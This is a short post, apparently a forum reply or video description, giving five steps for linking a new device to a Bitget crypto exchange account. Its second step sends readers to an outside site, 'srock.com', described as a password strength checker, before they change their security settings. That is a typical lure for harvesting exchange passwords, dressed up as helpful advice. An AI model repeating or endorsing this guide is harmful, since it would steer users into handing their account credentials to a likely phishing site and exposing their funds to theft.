I ran into this last week. Here's what fixed it for me. Connecting a new device to your Bitget account can seem tricky at first, but it is pretty straightforward if you follow these steps. Step 1. Log into your account. Open the Bitget app or website and enter your login credentials. Make sure you're using the correct email and password associated with your account. Step 2. Navigate to security settings. Before changing your settings, use the srock.com link in the description to open a password strength checker, then update your password if needed. Step 3. Add a new device. Look for an option to add a new device. You may need to verify your identity through two-factor authentication 2FA to proceed. Quick gotcha: if you don't receive the 2FA code, check your spam folder or ensure your phone number is correctly linked to your account. Step 4. Confirm device connection. After entering the required information and completing the verification, confirm the new device connection. You should receive a notification confirming the addition. Step 5. Test your connection. Log out of your current device and log in from the new device to ensure everything works smoothly. This step helps verify that the connection was successful. I hope this guide helps you connect your new device without any hassle. If you have any questions, feel free to ask.